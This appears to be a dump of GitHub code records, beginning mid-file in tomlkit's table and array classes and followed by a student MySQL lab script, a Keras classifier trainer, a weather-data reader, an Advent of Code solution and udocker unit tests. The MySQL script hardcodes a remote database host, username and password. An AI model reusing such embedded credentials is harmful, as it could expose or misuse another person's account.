]+).*$\", self._trivia.indent)\n if not m:\n return\n\n indent = m.group(1)\n\n if not isinstance(value, Whitespace):\n m = re.match(\"(?s)^([^ ]*)(.*)$\", value.trivia.indent)\n if not m:\n value.trivia.indent = indent\n else:\n value.trivia.indent = m.group(1) + indent + m.group(2)\n\n\nclass Table(AbstractTable):\n \"\"\"\n A table literal.\n \"\"\"\n\n def __init__(\n self,\n value: container.Container,\n trivia: Trivia,\n is_aot_element: bool,\n is_super_table: bool | None = None,\n name: str | None = None,\n display_name: str | None = None,\n ) -> None:\n super().__init__(value, trivia)\n\n self.name = name\n self.display_name = display_name\n self._is_aot_element = is_aot_element\n self._is_super_table = is_super_table\n\n @property\n def discriminant(self) -> int:\n return 9\n\n def __copy__(self) -> Table:\n return type(self)(\n self._value.copy(),\n self._trivia.copy(),\n self._is_aot_element,\n self._is_super_table,\n self.name,\n self.display_name,\n )\n\n def append(self, key: Key | str | None, _item: Any) -> Table:\n \"\"\"\n Appends a (key, item) to the table.\n \"\"\"\n if not isinstance(_item, Item):\n _item = item(_item, _parent=self)\n\n self._value.append(key, _item)\n\n if isinstance(key, Key):\n key = next(iter(key)).key\n _item = self._value[key]\n\n if key is not None:\n dict.__setitem__(self, key, _item)\n\n m = re.match(r\"(?s)^[^ ]*([ ]+).*$\", self._trivia.indent)\n if not m:\n return self\n\n indent = m.group(1)\n\n if not isinstance(_item, Whitespace):\n m = re.match(\"(?s)^([^ ]*)(.*)$\", _item.trivia.indent)\n if not m:\n _item.trivia.indent = indent\n else:\n _item.trivia.indent = m.group(1) + indent + m.group(2)\n\n return self\n\n def raw_append(self, key: Key | str | None, _item: Any) -> Table:\n \"\"\"Similar to :meth:`append` but does not copy indentation.\"\"\"\n if not isinstance(_item, Item):\n _item = item(_item)\n\n self._value.append(key, _item)\n\n if isinstance(key, Key):\n key = next(iter(key)).key\n _item = self._value[key]\n\n if key is not None:\n dict.__setitem__(self, key, _item)\n\n return self\n\n def is_aot_element(self) -> bool:\n \"\"\"True if the table is the direct child of an AOT element.\"\"\"\n return self._is_aot_element\n\n def is_super_table(self) -> bool:\n \"\"\"A super table is the intermediate parent of a nested table as in [a.b.c].\n If true, it won't appear in the TOML representation.\"\"\"\n if self._is_super_table is not None:\n return self._is_super_table\n # If the table has only one child and that child is a table, then it is a super table.\n if len(self) != 1:\n return False\n only_child = next(iter(self.values()))\n return isinstance(only_child, (Table, AoT))\n\n def as_string(self) -> str:\n return self._value.as_string()\n\n # Helpers\n\n def indent(self, indent: int) -> Table:\n \"\"\"Indent the table with given number of spaces.\"\"\"\n super().indent(indent)\n\n m = re.match(\"(?s)^[^ ]*([ ]+).*$\", self._trivia.indent)\n if not m:\n indent_str = \"\"\n else:\n indent_str = m.group(1)\n\n for _, item in self._value.body:\n if not isinstance(item, Whitespace):\n item.trivia.indent = indent_str + item.trivia.indent\n\n return self\n\n def invalidate_display_name(self):\n self.display_name = None\n\n for child in self.values():\n if hasattr(child, \"invalidate_display_name\"):\n child.invalidate_display_name()\n\n def _getstate(self, protocol: int = 3) -> tuple:\n return (\n self._value,\n self._trivia,\n self._is_aot_element,\n self._is_super_table,\n self.name,\n self.display_name,\n )\n\n\nclass InlineTable(AbstractTable):\n \"\"\"\n An inline table literal.\n \"\"\"\n\n def __init__(\n self, value: container.Container, trivia: Trivia, new: bool = False\n ) -> None:\n super().__init__(value, trivia)\n\n self._new = new\n\n @property\n def discriminant(self) -> int:\n return 10\n\n def append(self, key: Key | str | None, _item: Any) -> InlineTable:\n \"\"\"\n Appends a (key, item) to the table.\n \"\"\"\n if not isinstance(_item, Item):\n _item = item(_item, _parent=self)\n\n if not isinstance(_item, (Whitespace, Comment)):\n if not _item.trivia.indent and len(self._value) > 0 and not self._new:\n _item.trivia.indent = \" \"\n if _item.trivia.comment:\n _item.trivia.comment = \"\"\n\n self._value.append(key, _item)\n\n if isinstance(key, Key):\n key = key.key\n\n if key is not None:\n dict.__setitem__(self, key, _item)\n\n return self\n\n def as_string(self) -> str:\n buf = \"{\"\n last_item_idx = next(\n (\n i\n for i in range(len(self._value.body) - 1, -1, -1)\n if self._value.body[i][0] is not None\n ),\n None,\n )\n for i, (k, v) in enumerate(self._value.body):\n if k is None:\n if i == len(self._value.body) - 1:\n if self._new:\n buf = buf.rstrip(\", \")\n else:\n buf = buf.rstrip(\",\")\n\n buf += v.as_string()\n\n continue\n\n v_trivia_trail = v.trivia.trail.replace(\"\\n\", \"\")\n buf += (\n f\"{v.trivia.indent}\"\n f'{k.as_string() + (\".\" if k.is_dotted() else \"\")}'\n f\"{k.sep}\"\n f\"{v.as_string()}\"\n f\"{v.trivia.comment}\"\n f\"{v_trivia_trail}\"\n )\n\n if last_item_idx is not None and i < last_item_idx:\n buf += \",\"\n if self._new:\n buf += \" \"\n\n buf += \"}\"\n\n return buf\n\n def __setitem__(self, key: Key | str, value: Any) -> None:\n if hasattr(value, \"trivia\") and value.trivia.comment:\n value.trivia.comment = \"\"\n super().__setitem__(key, value)\n\n def __copy__(self) -> InlineTable:\n return type(self)(self._value.copy(), self._trivia.copy(), self._new)\n\n def _getstate(self, protocol: int = 3) -> tuple:\n return (self._value, self._trivia)\n\n\nclass String(str, Item):\n \"\"\"\n A string literal.\n \"\"\"\n\n def __new__(cls, t, value, original, trivia):\n return super().__new__(cls, value)\n\n def __init__(self, t: StringType, _: str, original: str, trivia: Trivia) -> None:\n super().__init__(trivia)\n\n self._t = t\n self._original = original\n\n def unwrap(self) -> str:\n return str(self)\n\n @property\n def discriminant(self) -> int:\n return 11\n\n @property\n def value(self) -> str:\n return self\n\n def as_string(self) -> str:\n return f\"{self._t.value}{decode(self._original)}{self._t.value}\"\n\n def __add__(self: ItemT, other: str) -> ItemT:\n if not isinstance(other, str):\n return NotImplemented\n result = super().__add__(other)\n original = self._original + getattr(other, \"_original\", other)\n\n return self._new(result, original)\n\n def _new(self, result: str, original: str) -> String:\n return String(self._t, result, original, self._trivia)\n\n def _getstate(self, protocol=3):\n return self._t, str(self), self._original, self._trivia\n\n @classmethod\n def from_raw(cls, value: str, type_=StringType.SLB, escape=True) -> String:\n value = decode(value)\n\n invalid = type_.invalid_sequences\n if any(c in value for c in invalid):\n raise InvalidStringError(value, invalid, type_.value)\n\n escaped = type_.escaped_sequences\n string_value = escape_string(value, escaped) if escape and escaped else value\n\n return cls(type_, decode(value), string_value, Trivia())\n\n\nclass AoT(Item, _CustomList):\n \"\"\"\n An array of table literal\n \"\"\"\n\n def __init__(\n self, body: list[Table], name: str | None = None, parsed: bool = False\n ) -> None:\n self.name = name\n self._body: list[Table] = []\n self._parsed = parsed\n\n super().__init__(Trivia(trail=\"\"))\n\n for table in body:\n self.append(table)\n\n def unwrap(self) -> list[dict[str, Any]]:\n unwrapped = []\n for t in self._body:\n if hasattr(t, \"unwrap\"):\n unwrapped.append(t.unwrap())\n else:\n unwrapped.append(t)\n return unwrapped\n\n @property\n def body(self) -> list[Table]:\n return self._body\n\n @property\n def discriminant(self) -> int:\n return 12\n\n @property\n def value(self) -> list[dict[Any, Any]]:\n return [v.value for v in self._body]\n\n def __len__(self) -> int:\n return len(self._body)\n\n @overload\n def __getitem__(self, key: slice) -> list[Table]:\n ...\n\n @overload\n def __getitem__(self, key: int) -> Table:\n ...\n\n def __getitem__(self, key):\n return self._body[key]\n\n def __setitem__(self, key: slice | int, value: Any) -> None:\n raise NotImplementedError\n\n def __delitem__(self, key: slice | int) -> None:\n del self._body[key]\n list.__delitem__(self, key)\n\n def insert(self, index: int, value: dict) -> None:\n value = item(value, _parent=self)\n if not isinstance(value, Table):\n raise ValueError(f\"Unsupported insert value type: {type(value)}\")\n length = len(self)\n if index < 0:\n index += length\n if index < 0:\n index = 0\n elif index >= length:\n index = length\n m = re.match(\"(?s)^[^ ]*([ ]+).*$\", self._trivia.indent)\n if m:\n indent = m.group(1)\n\n m = re.match(\"(?s)^([^ ]*)(.*)$\", value.trivia.indent)\n if not m:\n value.trivia.indent = indent\n else:\n value.trivia.indent = m.group(1) + indent + m.group(2)\n prev_table = self._body[index - 1] if 0 < index and length else None\n next_table = self._body[index + 1] if index < length - 1 else None\n if not self._parsed:\n if prev_table and \"\\n\" not in value.trivia.indent:\n value.trivia.indent = \"\\n\" + value.trivia.indent\n if next_table and \"\\n\" not in next_table.trivia.indent:\n next_table.trivia.indent = \"\\n\" + next_table.trivia.indent\n self._body.insert(index, value)\n list.insert(self, index, value)\n\n def invalidate_display_name(self):\n \"\"\"Call ``invalidate_display_name`` on the contained tables\"\"\"\n for child in self:\n if hasattr(child, \"invalidate_display_name\"):\n child.invalidate_display_name()\n\n def as_string(self) -> str:\n b = \"\"\n for table in self._body:\n b += table.as_string()\n\n return b\n\n def __repr__(self) -> str:\n return f\"\"\n\n def _getstate(self, protocol=3):\n return self._body, self.name, self._parsed\n\n\nclass Null(Item):\n \"\"\"\n A null item.\n \"\"\"\n\n def __init__(self) -> None:\n pass\n\n def unwrap(self) -> None:\n return None\n\n @property\n def discriminant(self) -> int:\n return -1\n\n @property\n def value(self) -> None:\n return None\n\n def as_string(self) -> str:\n return \"\"\n\n def _getstate(self, protocol=3) -> tuple:\n return ()\n","repo_name":"pypa/pipenv","sub_path":"pipenv/vendor/tomlkit/items.py","file_name":"items.py","file_ext":"py","file_size_in_byte":53096,"program_lang":"python","lang":"en","doc_type":"code","stars":24273,"dataset":"github-code","pt":"34"} +{"seq_id":"37986800822","text":"import mysql.connector\n\nmy_con = mysql.connector.connect(\n host=\"remotemysql.com\",\n user=\"bPHiiRCWTe\",\n passwd=\"Ftl2nnrmAp\",\n database=\"bPHiiRCWTe\"\n)\nprint('connected!')\ncursor = my_con.cursor()\n\n# 1.3\nprint('\\nprinting character names showing only lastname')\ncursor.execute(\"SELECT * FROM characters RIGHT JOIN anime ON characters.animeFK = anime.id\")\nfor x in cursor:\n if x[0] == 3 or x[0] == 4:\n print(x, sep=\" \")\n\n# 1.4\n# characters = \"INSERT INTO characters (id, fName, lName, popularity, animeFK) VALUES(%s , %s, %s, %s, %s)\"\n# abcde = (501470, 'Nobita', 'Nobisuge', 42, 24)\n# cursor.execute(characters, abcde)\n# cursor.execute(\"SELECT * FROM characters\")\n# for x in cursor:\n# if x[0] == 501470 :\n# print(x, sep=\" \")\n\n# 1.5\ncursor.execute(\"SELECT * FROM characters RIGHT JOIN anime ON characters.animeFK = anime.id\")\nfor x in cursor:\n if x[0] == 501470:\n print(x[0], x[1], x[2], x[3], x[4], x[6], x[7], sep=\" \")\n\n# print('\\nprinting anime names')\n# cursor.execute(\"SELECT * FROM anime\")\n# for y in cursor:\n# id = y[0]\n# print(id, y[1], sep=\" \")\n\ncursor.close()\n# my_con.commit()\nmy_con.close()\n","repo_name":"tamatee/KMITL","sub_path":"Year1/firstSemester/comSci/Lab5/Lab5_pechon.py","file_name":"Lab5_pechon.py","file_ext":"py","file_size_in_byte":1152,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"7837921005","text":"import csv\nimport numpy as np\nimport pandas as pd\nfrom sklearn.preprocessing import MinMaxScaler\nfrom sklearn.model_selection import train_test_split\nfrom keras.utils import to_categorical\nfrom keras.models import Sequential\nfrom keras.layers import Dense\nfrom keras.optimizers import SGD\nfrom keras.callbacks import ModelCheckpoint\n\nMODEL_FILE = 'nn_model.hd5'\nDATA_FILE = 'data.csv'\n\ndef process_data(data_name):\n #open csv file\n with open(data_name, 'r') as csvfile:\n data = list(csv.reader(csvfile, delimiter=\",\"))\n #convert columns into strings (bools for results column)\n for i in range(1,len(data)):\n for j in range(len(data[i])-1):\n data[i][j] = float(data[i][j])\n data[i][-1] = bool(int(data[i][-1]))\n\n #organising in dataframes\n pre_data = pd.DataFrame(data)\n x_data = pre_data.iloc[1:,:-1].dropna()\n y_data = pre_data.iloc[1:,-1].dropna()\n\n #scaling data to [0,1]\n scaler = MinMaxScaler()\n scaler.fit(x_data)\n X = pd.DataFrame(scaler.transform(x_data))\n\n #adding noise to our data to increase data size\n noisy_X = pd.DataFrame()\n mu=0\n for i in range(X.shape[1]):\n #standard deviation of each column that corresponds to 'off' state \n std = X[(~y_data.astype(bool)).values][:][i].std()\n print(std)\n #std = X[y_data.values][:][i].std()\n noise = np.random.normal(mu, std, size = X[:][i].shape)\n noisy_X[i] = X[:][i] + noise\n\n X = pd.concat([X, noisy_X], axis=0)\n Y = pd.DataFrame(to_categorical(y = y_data, num_classes = 2)) \n Y = pd.concat([Y, Y], axis=0) \n \n #split training from test data\n X_train, X_test, Y_train, Y_test = train_test_split(X, Y, test_size = 0.2, random_state = 1)\n \n return (x_data, X_train, X_test, Y_train, Y_test)\n\ndef build_train_model(model_name, x_data, X_train, X_test, Y_train, Y_test):\n #BUILD\n # Create the neural network\n nn = Sequential()\n nn.add(Dense(100, input_shape = (4, ), activation = 'relu'))\n nn.add(Dense(2, activation = 'softmax'))\n\n # Create our optimizer\n sgd = SGD(learning_rate = 0.2)\n\n #TRAIN\n # 'Compile' the network to associate it with a loss function,\n # an optimizer, and what metrics we want to track\n nn.compile(loss='categorical_crossentropy', optimizer=sgd, metrics = 'accuracy')\n \n #save file as '.hd5'\n checkpoint = ModelCheckpoint(model_name)\n \n nn.fit(X_train, Y_train, shuffle = True, epochs = 100, validation_data = (X_test, Y_test), callbacks=[checkpoint])\n \n #save max and min values for later scaling\n update_extremes(x_data, model_name)\n\ndef update_extremes(x_values, model_name):\n f = open(model_name + \"/extremes.csv\",\"w\")\n for i in range(x_values.shape[1]):\n max_val = x_values.iloc[:,i].max()\n min_val = x_values.iloc[:,i].min()\n f.write(str(min_val) + \"; \" + str(max_val) + \"\\n\")\n \ndef main():\n (x_data, X_train, X_test, Y_train, Y_test) = process_data(DATA_FILE)\n #parameters to test out: epochs, learning_rate, amount of layers, width of layers, loss, activation\n build_train_model(MODEL_FILE, x_data, X_train, X_test, Y_train, Y_test)\n\nif __name__ == '__main__':\n main()\n","repo_name":"MohammedHamlili/Laundromates_IOT","sub_path":"IOT_project_final/ML_model/nn.py","file_name":"nn.py","file_ext":"py","file_size_in_byte":3205,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"5997710874","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu May 12 10:22:47 2016\n\nRead in weather data\n\n@author: l.kotzur\n\"\"\"\nimport os\nimport pvlib\nimport math\n\nimport numpy as np\nimport pandas as pd\n\nimport tsib.data\nimport tsib\n\n# ignore pv lib warnings\nnp.seterr(divide=\"ignore\")\nnp.seterr(invalid=\"ignore\")\n\n\n\ndef calcGHI(timeSeries, longitude, latitude):\n \"\"\"\n Calculates the global horizontal irradiation (GHI) by time, diffuse\n horizontal irradiation (DHI) and direct normal irradiation (DNI).\n \"\"\"\n solarPos = pvlib.solarposition.get_solarposition(\n timeSeries.index, latitude, longitude\n )\n if \"DNI\" in timeSeries:\n timeSeries[\"GHI\"] = timeSeries[\"DHI\"] + timeSeries[\"DNI\"] * math.cos(\n math.radians(solarPos[\"apparent_zenith\"])\n )\n elif \"B\" in timeSeries: # Direct horizontal irradiation TRY\n timeSeries[\"GHI\"] = timeSeries[\"DHI\"] + timeSeries[\"B\"]\n return timeSeries\n\n\ndef readTMY(filepath=os.path.join(\"TMY\", \"Germany DEU Koln (INTL).csv\")):\n \"\"\"\n Reads a typical meteorological year file and gets the GHI, DHI and DNI from it.\n \"\"\"\n # get data\n data = pd.read_csv(\n os.path.join(tsib.data.PATH, \"weatherdata\", filepath),\n skiprows=([0, 1]),\n sep=\",\",\n )\n data.index = pd.date_range(\n \"2010-01-01 00:30:00\", periods=8760, freq=\"H\", tz=\"Europe/Berlin\"\n )\n data = data.rename(\n columns={\"Beam\": \"DNI\", \"Diffuse\": \"DHI\", \"Tdry\": \"T\", \"Wspd\": \"WS\"}\n )\n location_data = pd.read_csv(\n os.path.join(tsib.data.PATH, \"profiles\", filepath), nrows=1, sep=\",\"\n )\n\n location = {\n \"name\": location_data[\"City\"].values[0],\n \"latitude\": location_data[\"Latitude\"].values[0],\n \"longitude\": location_data[\"Longitude\"].values[0],\n }\n return data, location\n\n\n\ndef readTRY(try_num=4, year=2010):\n \"\"\"\n Reads a test refence year file and gets the GHI, DHI and DNI from it.\n \n Parameters\n -------\n try_num: int (default: 4)\n The region number of the test reference year.\n year: int (default: 2010)\n The year. Only data for 2010 and 2030 available\n \"\"\"\n # get the correct file path\n filepath = os.path.join(\n tsib.data.PATH,\n \"weatherdata\",\n \"TRY\",\n \"TRY\" + str(year) + \"_\" + str(try_num).zfill(2) + \"_Jahr\",\n )\n\n # get the geoposition\n with open(filepath + \".dat\", encoding=\"utf-8\") as fp:\n lines = fp.readlines()\n location_name = lines[1][9:-18].encode(\"utf-8\").rstrip()\n lat = float(lines[2][6:8]) + float(lines[2][9:11]) / 60.0\n lon = float(lines[2][21:23]) + float(lines[2][24:26]) / 60.0\n location = {\"name\": location_name, \"latitude\": lat, \"longitude\": lon}\n\n # check if time series data already exists as .csv with DNI\n if os.path.isfile(filepath + \".csv\"):\n data = pd.read_csv(filepath + \".csv\", index_col=0, parse_dates=True)\n data.index = pd.to_datetime(data.index, utc=True).tz_convert(\"Europe/Berlin\")\n # else read from .dat and calculate DNI etc.\n else:\n # get data\n data = pd.read_csv(\n filepath + \".dat\", sep=r\"\\s+\", skiprows=([i for i in range(0, 36)] + [37])\n )\n data.index = pd.date_range(\n \"2010-01-01 00:30:00\", periods=8760, freq=\"H\", tz=\"Europe/Berlin\"\n )\n data[\"GHI\"] = data[\"D\"] + data[\"B\"]\n data = data.rename(columns={\"D\": \"DHI\", \"t\": \"T\", \"WG\": \"WS\"})\n\n # calculate direct normal\n data[\"DNI\"] = calculateDNI(data[\"B\"], lon, lat)\n\n # save as .csv\n data.to_csv(filepath + \".csv\")\n return data, location\n\n\n\ndef calculateDNI(directHI, lon, lat, zenith_tol=87.0):\n \"\"\"\n Calculates the direct NORMAL irradiance from the direct horizontal irradiance with the help of the PV lib.\n\n Parameters\n ----------\n directHI: pd.Series with time index\n Direct horizontal irradiance\n lon: float\n Longitude of the loaction\n lat: float\n Latitude of the location\n zenith_tol: float, optional\n Avoid cosinus of values above a certain zenith angle of in order to avoid division by zero.\n\n Returns\n -------\n DNI: pd.Series\n \"\"\"\n solarPos = pvlib.solarposition.get_solarposition(directHI.index, lat, lon)\n solarPos[\"apparent_zenith\"][solarPos.apparent_zenith > zenith_tol] = zenith_tol\n DNI = directHI.div(solarPos[\"apparent_zenith\"].apply(math.radians).apply(math.cos))\n if DNI.isnull().values.any():\n raise ValueError(\"Something went wrong...\")\n return DNI\n\n\ndef TRY2TM2(trydata):\n \"\"\"\n Takes a pd.DataFrame from the readTRY function and translate the column\n names to the TM2 format.\n \"\"\"\n trydata[\"Year\"] = 2010\n trydata = trydata.rename(\n columns={\n \"MM\": \"Month\",\n \"DD\": \"Day\",\n \"HH\": \"Hour\",\n \"T\": \"Tdry\",\n \"p\": \"Pres\",\n \"WR\": \"Wdir\",\n \"WS\": \"Wspd\",\n }\n )\n trydata[\"Tdew\"] = trydata[\"Tdry\"]\n\n return trydata[\n [\n \"Year\",\n \"Month\",\n \"Day\",\n \"Hour\",\n \"GHI\",\n \"DHI\",\n \"Tdry\",\n \"Tdew\",\n \"Pres\",\n \"Wdir\",\n \"Wspd\",\n ]\n ]\n\n\ndef TRY2TMY(trydata):\n \"\"\"\n Takes a pd.DataFrame from the readTRY function and translate the column\n names to the TM2 format.\n \"\"\"\n return trydata.rename(\n columns={\n \"MM\": \"Month\",\n \"DD\": \"Day\",\n \"HH\": \"Hour\",\n \"T\": \"DryBulb\",\n \"p\": \"Pressure\",\n \"WR\": \"Wdir\",\n \"WS\": \"Wspd\",\n }\n )\n\n\n\ndef getISO12831weather(longitude, latitude, year=2010, cosmo=False):\n \"\"\"\n\n Gets the test reference year location and the design temperatures for\n the heating system based on the ISO12831.\n Parameters\n ----------\n longitude: float\n latitude: float\n year: int, optional (default: 2010)\n cosmo: bool, optional (default: False)\n If the weather data shall be extracted from the cosmo database.\n Returns\n -------\n weather (DataFrame with TRY weather)\n T_min (design temperature for heating),\n weatherID (str with climate zone)\n \"\"\"\n\n # read weather zones\n wzones = pd.read_csv(\n os.path.join(tsib.data.PATH, \"weatherdata\", \"ISO12831\", \"T_zones_Ger_final.csv\"),\n index_col=0,\n encoding=\"ISO-8859-1\",\n )\n\n # get distance to all reference weather station points\n dist = ((wzones[\"Lat\"] - latitude) ** 2 + (wzones[\"Lng\"] - longitude) ** 2) ** 0.5\n\n # if distance to next reference position is to high.\n if min(dist) > 5:\n raise NotImplementedError(\n \"The weather data is at the moment\" + \" only implemented for Germany\"\n )\n\n # get the data from the one with the minimal distance\n loc_w = wzones.loc[dist.idxmin(), :]\n design_T_min = loc_w[\"Min T\"]\n\n # read weather data of related try region\n if not cosmo:\n weatherID = \"TRY_\" + str(loc_w[\"Climate Zone\"])\n weather, loc = readTRY(try_num=loc_w[\"Climate Zone\"], year=year)\n else:\n weather, weatherID = tsib.readCosmo(\n os.path.join(\n os.environ[\"DATA_SHARE\"], \"weather\", \"cosmo\", \"rea6\", \"processed\"\n ),\n longitude,\n latitude,\n year,\n )\n\n return weather, design_T_min, weatherID\n\n\n","repo_name":"FZJ-IEK3-VSA/tsib","sub_path":"tsib/weather/testreferenceyear.py","file_name":"testreferenceyear.py","file_ext":"py","file_size_in_byte":7419,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"34"} +{"seq_id":"10193489439","text":"import numpy as np\n\ndef read_from_input():\n with open('input.txt', 'r') as f:\n return f.read()\n\ndots, folds = [x.split('\\n') for x in read_from_input().split('\\n\\n')]\n\nmax_x = 0\nmax_y = 0\n\nclass Point:\n def __init__(self, x, y):\n global max_x, max_y\n self.x = x\n self.y = y\n if x > max_x:\n max_x = x\n if y > max_y:\n max_y = y\n\n def __str__(self):\n return f'({self.x}, {self.y})'\n \n def __repr__(self):\n return self.__str__()\n\nclass Fold:\n axis: str\n value: int\n\n def __init__(self, axis: str, value: str):\n self.axis = axis\n self.value = int(value)\n \n def __str__(self):\n return f\"(axis: {self.axis}, value: {self.value})\"\n \n def __repr__(self):\n return self.__str__()\n\n\ndots = [Point(*map(int, x.split(','))) for x in dots]\nfolds = [Fold(*x.split(' ')[-1].split('=')) for x in folds]\n\nmatrix = np.zeros(shape=(max_y+1, max_x+1))\nfor dot in dots:\n matrix[dot.y][dot.x] = 1\n\ndef do_fold(matrix: np.array, fold: Fold):\n rows, cols = matrix.shape\n if fold.axis == 'y':\n new_matrix = matrix[0:fold.value, :]\n else:\n new_matrix = matrix[:, 0:fold.value]\n if fold.axis == 'x':\n for i in range(rows):\n for j in range(fold.value):\n if new_matrix[i][j] == 0:\n new_matrix[i][j] = matrix[i][cols - j - 1]\n elif fold.axis == 'y':\n for i in range(fold.value):\n for j in range(cols):\n if new_matrix[i][j] == 0:\n new_matrix[i][j] = matrix[rows - i - 1][j]\n\n return new_matrix\n\ndef visible_dots(matrix: np.array):\n rows, cols = matrix.shape\n visible = 0\n for i in range(rows):\n for j in range(cols):\n if matrix[i][j] == 1:\n visible += 1\n return visible\n\nfor i, f in enumerate(folds):\n matrix = do_fold(matrix, f)\n if i == 0:\n print(f\"Visible dots after first fold: {visible_dots(matrix)}\")\n\nfor row in matrix:\n for value in row:\n print('#' if value == 1 else '.', end='')\n print('\\n')","repo_name":"Atari2/AdventOfCode2021","sub_path":"day13/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":2120,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"984661713","text":"#!/usr/bin/env python\n\"\"\"\nudocker unit tests: NVIDIA mode\n\"\"\"\n\nfrom unittest import TestCase, main\nfrom unittest.mock import patch, Mock\nfrom udocker.config import Config\nfrom udocker.engine.nvidia import NvidiaMode\nimport collections\n\ncollections.Callable = collections.abc.Callable\n\n\nclass NvidiaModeTestCase(TestCase):\n \"\"\"Test PRootEngine() class for containers execution.\"\"\"\n\n def setUp(self):\n Config().getconf()\n Config().conf['nvi_dev_list'] = ['/dev/nvidia']\n self.cont_id = \"12345a\"\n str_local = 'udocker.container.localrepo.LocalRepository'\n self.lrepo = patch(str_local)\n self.local = self.lrepo.start()\n self.mock_lrepo = Mock()\n self.local.return_value = self.mock_lrepo\n str_cd = str_local + '.cd_container'\n self.cdcont = patch(str_cd, return_value=\"/\" + self.cont_id)\n self.mock_cdcont = self.cdcont.start()\n\n def tearDown(self):\n self.lrepo.stop()\n self.cdcont.stop()\n\n def test_01_init(self):\n \"\"\"Test01 NvidiaMode() constructor.\"\"\"\n cdir = \"/\" + self.cont_id\n nvmode = NvidiaMode(self.local, self.cont_id)\n self.assertTrue(self.mock_cdcont.called)\n self.assertEqual(nvmode.container_dir, cdir)\n self.assertEqual(nvmode.container_root, cdir + \"/ROOT\")\n self.assertEqual(nvmode._container_nvidia_set, cdir + \"/nvidia\")\n\n @patch('udocker.engine.nvidia.os.path.exists')\n def test_02__files_exist(self, mock_exists):\n \"\"\"Test02 NvidiaMode._files_exist.\"\"\"\n cont_dst_dir = \"/home/.udocker/container\"\n files_list = [\"a\", \"b\"]\n mock_exists.return_value = False\n nvmode = NvidiaMode(self.local, self.cont_id)\n nvmode._files_exist(cont_dst_dir, files_list)\n self.assertTrue(mock_exists.called)\n\n @patch('udocker.engine.nvidia.Msg')\n @patch('udocker.engine.nvidia.os.access')\n @patch('udocker.engine.nvidia.stat')\n @patch('udocker.engine.nvidia.shutil.copy2')\n @patch('udocker.engine.nvidia.os.symlink')\n @patch('udocker.engine.nvidia.os.readlink')\n @patch('udocker.engine.nvidia.os.chmod')\n @patch('udocker.engine.nvidia.os.makedirs')\n @patch('udocker.engine.nvidia.os.path.isdir')\n @patch('udocker.engine.nvidia.os.path.dirname')\n @patch('udocker.engine.nvidia.os.remove')\n @patch('udocker.engine.nvidia.os.path.islink')\n @patch('udocker.engine.nvidia.os.path.isfile')\n def test_03__copy_files(self, mock_isfile, mock_islink, mock_rm,\n mock_dirname, mock_isdir, mock_mkdir, mock_chmod,\n mock_readln, mock_symln, mock_copy2, mock_stat,\n mock_access, mock_msg):\n \"\"\"Test03 NvidiaMode._copy_files.\"\"\"\n hsrc_dir = \"/usr/lib\"\n cdst_dir = \"/hone/.udocker/cont/ROOT/usr/lib\"\n flist = [\"a\"]\n force = False\n mock_msg.level = 0\n mock_isfile.side_effect = [True, False]\n mock_islink.side_effect = [True, False]\n mock_rm.return_value = None\n nvmode = NvidiaMode(self.local, self.cont_id)\n status = nvmode._copy_files(hsrc_dir, cdst_dir, flist, force)\n self.assertFalse(status)\n self.assertTrue(mock_isfile.called)\n\n force = True\n mock_msg.level = 0\n mock_isfile.side_effect = [True, True]\n mock_islink.side_effect = [True, False]\n mock_dirname.side_effect = [None, None]\n mock_rm.return_value = None\n mock_isdir.return_value = True\n mock_mkdir.return_value = None\n mock_chmod.side_effect = [644, 755]\n mock_readln.return_value = \"/usr/xxx\"\n mock_symln.return_value = None\n mock_copy2.return_value = None\n mock_stat.side_effect = [444, 222, 111, 111]\n mock_access.return_value = False\n nvmode = NvidiaMode(self.local, self.cont_id)\n status = nvmode._copy_files(hsrc_dir, cdst_dir, flist, force)\n self.assertTrue(status)\n self.assertTrue(mock_isfile.called)\n self.assertTrue(mock_rm.called)\n\n @patch('udocker.engine.nvidia.glob.glob')\n def test_04__get_nvidia_libs(self, mock_glob):\n \"\"\"Test04 NvidiaMode._get_nvidia_libs.\"\"\"\n host_dir = \"/usr/lib\"\n Config.conf['nvi_lib_list'] = ['/lib/libnvidia.so']\n mock_glob.return_value = ['/lib/libnvidia.so']\n nvmode = NvidiaMode(self.local, self.cont_id)\n status = nvmode._get_nvidia_libs(host_dir)\n # self.assertEqual(status, Config.conf['nvi_lib_list'])\n\n # @patch('udocker.engine.nvidia.os.path.realpath')\n # @patch('udocker.engine.nvidia.Uprocess.get_output')\n # def test_05__find_host_dir_ldconfig(self, mock_uproc, mock_realp):\n # \"\"\"Test05 NvidiaMode._find_host_dir_ldconfig.\"\"\"\n # res_set = set()\n # mock_uproc.return_value = \\\n # \"libnvidia-cfg.so.1 (libc6,x86-64) => \\\n # /lib/x86_64-linux-gnu/libnvidia-cfg.so.1\"\n # mock_realp.return_value = \"/lib/x86_64-linux-gnu/libnvidia-cfg.so.1\"\n # res_set.add(\"/lib/x86_64-linux-gnu/\")\n # nvmode = NvidiaMode(self.local, self.cont_id)\n # status = nvmode._find_host_dir_ldconfig()\n # self.assertEqual(status, res_set)\n\n # def test_06__find_host_dir_ldpath(self):\n # \"\"\"Test06 NvidiaMode._find_host_dir_ldpath.\"\"\"\n\n @patch.object(NvidiaMode, '_find_host_dir_ldconfig')\n @patch.object(NvidiaMode, '_find_host_dir_ldpath')\n @patch('udocker.engine.nvidia.Msg')\n def test_07__find_host_dir(self, mock_msg, mock_ldpath, mock_ldconf):\n \"\"\"Test07 NvidiaMode._find_host_dir.\"\"\"\n res = set()\n mock_msg.return_value.level.return_value = 0\n mock_ldpath.side_effect = [res, res]\n mock_ldconf.return_value = res\n nvmode = NvidiaMode(self.local, self.cont_id)\n status = nvmode._find_host_dir()\n self.assertEqual(status, res)\n self.assertTrue(mock_ldpath.called)\n self.assertTrue(mock_ldconf.called)\n\n res = set()\n res.add(\"/lib/x86_64-linux-gnu/\")\n mock_msg.return_value.level.return_value = 0\n mock_ldpath.side_effect = [set(), set()]\n mock_ldconf.return_value = res\n nvmode = NvidiaMode(self.local, self.cont_id)\n status = nvmode._find_host_dir()\n self.assertEqual(status, res)\n\n 